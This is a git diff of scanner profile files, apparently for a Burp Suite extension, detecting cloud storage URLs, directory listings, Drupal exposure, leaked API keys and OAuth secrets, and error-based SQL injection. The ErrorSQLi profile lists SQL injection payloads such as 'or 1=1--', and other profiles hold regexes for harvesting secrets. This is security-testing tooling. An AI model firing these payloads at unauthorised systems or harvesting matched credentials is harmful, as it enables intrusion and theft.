+[
+ {
+ "ProfileName": "DigitalOcean_Space_Discovered",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,http(?:s)://[^\u003e\u003c\\.\\\u0027\\\" \\n\\)]+.[^\u003e\u003c\\.\\\u0027\\\" \\n\\)]+.[^\u003e\u003c\\.\\\u0027\\\" \\n\\)]+.digitaloceanspaces.com"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "DigitalOcean Space Discovered",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/DirectoryListing.bb b/profiles/DirectoryListing.bb
new file mode 100755
index 0000000..e0d4f3c
--- /dev/null
+++ b/profiles/DirectoryListing.bb
@@ -0,0 +1,59 @@
+[
+ {
+ "ProfileName": "DirectoryListing",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,Index of /"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "DirectoryListing",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "Directory Listing found",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Drupalgeddon.bb b/profiles/Drupalgeddon.bb
new file mode 100755
index 0000000..4127638
--- /dev/null
+++ b/profiles/Drupalgeddon.bb
@@ -0,0 +1,59 @@
+[
+ {
+ "ProfileName": "Drupalgeddon",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,\\/user\\/register.*Powered by Drupal"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Drupalgeddon",
+ "IssueSeverity": "High",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "Possible Drupalgeddon 2 or 3:\u003cbr\u003e\n\n\u003cbr\u003ehttps://www.exploit-db.com/ghdb/4782/\n\n\u003cbr\u003ehttps://www.exploit-db.com/exploits/44482/\n\n\u003cbr\u003ehttps://www.exploit-db.com/exploits/44557/\n",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/EmailInput.bb b/profiles/EmailInput.bb
old mode 100644
new mode 100755
index bbf2713..330f79e
--- a/profiles/EmailInput.bb
+++ b/profiles/EmailInput.bb
@@ -1 +1,59 @@
-[{"Name":"EmailInput","Enabled":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["type\u003demail"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"EmailInput","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Email Input Found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "EmailInput",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 3,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,All Request,Value,type\u003demail"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "EmailInput",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "Email Input Found",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/EndpointsExtractor.bb b/profiles/EndpointsExtractor.bb
new file mode 100755
index 0000000..5a166b7
--- /dev/null
+++ b/profiles/EndpointsExtractor.bb
@@ -0,0 +1,59 @@
+[
+ {
+ "ProfileName": "EndpointsExtractor",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@GochaOqradze",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "false,,}\\.[a-zA-Z]{2,}[^\"\u0027]{0,})|((?:/|\\.\\./|\\./)[^\"\u0027\u003e\u003c,;| *()(%%$^/\\\\\\[\\]][^\"\u0027\u003e\u003c,;|()]{1,})|([a-zA-Z0-9_\\-/]{1,}/[a-zA-Z0-9_\\-/]{1,}\\.(?:[a-zA-Z]{1,4}|action)(?:[\\?|/][^\"|\u0027]{0,}|))|([a-zA-Z0-9_\\-]{1,}\\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:\\?[^\"|\u0027]{0,}|)))(?:\"|\u0027)"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": true,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "EndpointsExtractor",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "Regex by Gerben_Javado : \n\u003cbr\u003ehttps://github.com/GerbenJavado/LinkFinder/blob/master/linkfinder.py\n\n\u003cbr\u003e\u003cbr\u003eEndpoints: \u003cbr\u003e\u003cgrep\u003e",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Env_Vars.bb b/profiles/Env_Vars.bb
old mode 100644
new mode 100755
index 39aed23..89a03f6
--- a/profiles/Env_Vars.bb
+++ b/profiles/Env_Vars.bb
@@ -1 +1,59 @@
-[{"Name":"Env_Vars","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?i)(apikey|secret|key|api|password|pass|pw|host)\u003d[0-9a-zA-Z-_.{}]{4,120}"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Environment Variables","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Env_Vars",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,(?i)(apikey|secret|key|api|password|pass|pw|host)\u003d[0-9a-zA-Z-_.{}]{4,120}"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Environment Variables",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/ErrorPages-JobApps.bb b/profiles/ErrorPages-JobApps.bb
old mode 100644
new mode 100755
index 8f15352..91a12ed
--- a/profiles/ErrorPages-JobApps.bb
+++ b/profiles/ErrorPages-JobApps.bb
@@ -1 +1,60 @@
-[{"Name":"ErrorPages-JobApps","Enabled":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["syd_apply.cfm"],"Tags":["Errors"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"ErrorPages-JobApps","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Find error pages for job applications, sometimes can contain juicy information:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/5033/","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "ErrorPages-JobApps",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 3,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,All Request,Value,syd_apply.cfm"
+ ],
+ "Tags": [
+ "Errors",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "ErrorPages-JobApps",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "Find error pages for job applications, sometimes can contain juicy information:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/5033/",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/ErrorSQLi.bb b/profiles/ErrorSQLi.bb
index 9208199..b655914 100755
--- a/profiles/ErrorSQLi.bb
+++ b/profiles/ErrorSQLi.bb
@@ -1 +1,147 @@
-[{"Name":"ErrorSQLi","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["\u0027-\u0027","\u0027 \u0027","\u0027\u0026\u0027","\u0027^\u0027","\u0027*\u0027","\u0027 or \u0027\u0027-\u0027","\u0027 or \u0027\u0027 \u0027","\u0027 or \u0027\u0027\u0026\u0027","\u0027 or \u0027\u0027^\u0027","\u0027 or \u0027\u0027*\u0027","\"-\"","\" \"","\"\u0026\"","\"^\"","\"*\"","\" or \"\"-\"","\" or \"\" \"","\" or \"\"\u0026\"","\" or \"\"^\"","\" or \"\"*\"","or true--","\" or true--","\u0027 or true--","\") or true--","\u0027) or true--","\u0027 or \u0027x\u0027\u003d\u0027x","\u0027) or (\u0027x\u0027)\u003d(\u0027x","\u0027)) or ((\u0027x\u0027))\u003d((\u0027x","\" or \"x\"\u003d\"x","\") or (\"x\")\u003d(\"x","\")) or ((\"x\"))\u003d((\"x","or 1\u003d1","or 1\u003d1-- ","or 1\u003d1#","or 1\u003d1/*"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,Microsoft OLE DB Provider for ODBC Drivers error","true,Or,You have an error in your SQL syntax","true,Or,ORA-00933: SQL command not properly ended","true,Or,Microsoft SQL Native Client error","true,Or,Query failed: ERROR: syntax error at or near","true,Or,You have an error in your SQL syntax","true,Or,MySQL Error: 1064\" \u0026 \"Session halted","true,Or,mysql error with query","true,Or,sQL syntax error","true,Or,PostgreSQL query failed: ERROR: parser: parse error","true,Or,Warning: mysql_fetch_array","true,Or,Warning: mysql_num_rows","true,Or,Warning: mysql_query","true,Or,Warning: mysql_fetch_assoc","true,Or,Warning: mysql_result","true,Or,Warning: mysql_free_result"],"Tags":["SQLi","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":4,"MaxRedir":5,"payloadPosition":2,"payloadsFile":"","grepsFile":"","IssueName":"ErrorSQLi","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"Error SQLi with payloads: \u003cbr\u003e \u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "ErrorSQLi",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@egarme",
+ "Payloads": [
+ "true,\u0027-\u0027",
+ "true,\u0027 \u0027",
+ "true,\u0027\u0026\u0027",
+ "true,\u0027^\u0027",
+ "true,\u0027*\u0027",
+ "true,\u0027 or \u0027\u0027-\u0027",
+ "true,\u0027 or \u0027\u0027 \u0027",
+ "true,\u0027 or \u0027\u0027\u0026\u0027",
+ "true,\u0027 or \u0027\u0027^\u0027",
+ "true,\u0027 or \u0027\u0027*\u0027",
+ "true,\"-\"",
+ "true,\" \"",
+ "true,\"\u0026\"",
+ "true,\"^\"",
+ "true,\"*\"",
+ "true,\" or \"\"-\"",
+ "true,\" or \"\" \"",
+ "true,\" or \"\"\u0026\"",
+ "true,\" or \"\"^\"",
+ "true,\" or \"\"*\"",
+ "true,or true--",
+ "true,\" or true--",
+ "true,\u0027 or true--",
+ "true,\") or true--",
+ "true,\u0027) or true--",
+ "true,\u0027 or \u0027x\u0027\u003d\u0027x",
+ "true,\u0027) or (\u0027x\u0027)\u003d(\u0027x",
+ "true,\u0027)) or ((\u0027x\u0027))\u003d((\u0027x",
+ "true,\" or \"x\"\u003d\"x",
+ "true,\") or (\"x\")\u003d(\"x",
+ "true,\")) or ((\"x\"))\u003d((\"x",
+ "true,or 1\u003d1",
+ "true,or 1\u003d1-- ",
+ "true,or 1\u003d1#",
+ "true,or 1\u003d1/*"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,Microsoft OLE DB Provider for ODBC Drivers error",
+ "true,Or,You have an error in your SQL syntax",
+ "true,Or,ORA-00933: SQL command not properly ended",
+ "true,Or,Microsoft SQL Native Client error",
+ "true,Or,Query failed: ERROR: syntax error at or near",
+ "true,Or,You have an error in your SQL syntax",
+ "true,Or,MySQL Error: 1064\" \u0026 \"Session halted",
+ "true,Or,mysql error with query",
+ "true,Or,sQL syntax error",
+ "true,Or,PostgreSQL query failed: ERROR: parser: parse error",
+ "true,Or,Warning: mysql_fetch_array",
+ "true,Or,Warning: mysql_num_rows",
+ "true,Or,Warning: mysql_query",
+ "true,Or,Warning: mysql_fetch_assoc",
+ "true,Or,Warning: mysql_result",
+ "true,Or,Warning: mysql_free_result"
+ ],
+ "Tags": [
+ "SQLi",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 4,
+ "MaxRedir": 5,
+ "payloadPosition": 2,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "ErrorSQLi",
+ "IssueSeverity": "High",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "Error SQLi with payloads: \u003cbr\u003e \u003cpayload\u003e",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Facebook_Client_ID.bb b/profiles/Facebook_Client_ID.bb
old mode 100644
new mode 100755
index b2f527c..614008b
--- a/profiles/Facebook_Client_ID.bb
+++ b/profiles/Facebook_Client_ID.bb
@@ -1 +1,59 @@
-[{"Name":"Facebook_Client_ID","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?i)(facebook|fb)(.{0,20})?[\u0027\\\"][0-9]{13,17}"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Facebook client ID","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Facebook_Client_ID",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,(?i)(facebook|fb)(.{0,20})?[\u0027\\\"][0-9]{13,17}"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Facebook client ID",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Facebook_OAuth.bb b/profiles/Facebook_OAuth.bb
old mode 100644
new mode 100755
index 7112b81..1e20449
--- a/profiles/Facebook_OAuth.bb
+++ b/profiles/Facebook_OAuth.bb
@@ -1 +1,59 @@
-[{"Name":"Facebook_OAuth","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\u0027|\\\"][0-9a-f]{32}[\u0027|\\\"]"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Facebook OAuth","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Facebook_OAuth",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\u0027|\\\"][0-9a-f]{32}[\u0027|\\\"]"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Facebook OAuth",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/GCP_Service_Account.bb b/profiles/GCP_Service_Account.bb
old mode 100644
new mode 100755
index 72b087b..6e3a9f2
--- a/profiles/GCP_Service_Account.bb
+++ b/profiles/GCP_Service_Account.bb
@@ -1 +1,60 @@
